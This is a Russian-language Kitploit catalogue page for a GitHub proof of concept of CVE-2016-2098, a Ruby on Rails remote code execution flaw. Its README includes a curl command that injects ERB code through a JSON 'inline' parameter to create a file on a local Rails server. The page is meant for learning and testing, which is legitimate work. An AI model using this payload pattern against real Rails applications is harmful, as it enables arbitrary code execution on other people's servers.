Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
dh-CVE_2016_2098 — Концептуальное доказательство, показывающее, как CVE-2016-2098 приводит к удаленному выполнению кода | Kitploit
Инструменты/GitHubGitHub/hderms/dh-cve_2016_2098
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubhderms/dh-cve_2016_2098

dh-CVE_2016_2098

Концептуальное доказательство, показывающее, как CVE-2016-2098 приводит к удаленному выполнению кода

Репозиторий
3410 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

== README Доказательство концепции для https://groups.google.com/forum/#!topic/rubyonrails-security/ly-IH-fxr_Q

== Эксплуатация:

  1. Вы должны запускать rails сервер только так, чтобы быть уверенными, что это не сделает вас уязвимыми для эксплуатации.
  2. Запустите rails s
  3. Выполните следующую команду curl -v -H "Accept: application/json" -H "Content-type: application/json" -X GET -d ' {"id" : { "inline" : "<%= FileUtils.touch \"rooted\"%>"}}' http://localhost:3000/exploits
  4. Убедитесь, что файл "rooted" теперь существует в каталоге проекта.
Скачать инструмент